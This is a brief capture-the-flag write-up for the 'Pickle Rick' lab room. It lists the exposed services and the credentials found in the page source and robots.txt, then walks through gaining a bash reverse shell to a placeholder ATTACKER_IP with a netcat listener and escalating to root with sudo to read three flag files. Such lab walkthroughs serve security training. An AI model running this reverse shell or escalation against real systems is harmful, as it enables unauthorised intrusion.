Picke Rick CTF Room

Services

  • HTTP (Apache/2.4.18)
  • SSH (OpenSSH 7.2p2)

Web APP URLs

  • /login.php
  • /robots.txt

Login Panel

username: R1ckRul3s (from page source of homepage) password: Wubbalubbadubdub (from robots.txt)

First Ingredient

  • Login to /login.php using above credentials

  • start listener on attacker’s machine using

    nc -nlvp ATTACKER_PORT
    
  • create bash reverse shell (since, cat is disabled) using bash -c 'exec bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT <&1'

  • read secret file

    cat Sup3rS3cretPickl3Ingred.txt
    

    mr. meeseek hair

Second Ingredient

  • using command shell read second ingredient file

    cat "/home/rick/second ingredients"
    

    1 jerry tear

Third Ingredient

  • change user to ubuntu then root

    sudo su ubuntu
    sudo su root
    
  • Read third file

    cat /root/3rd.txt
    

    fleeb juice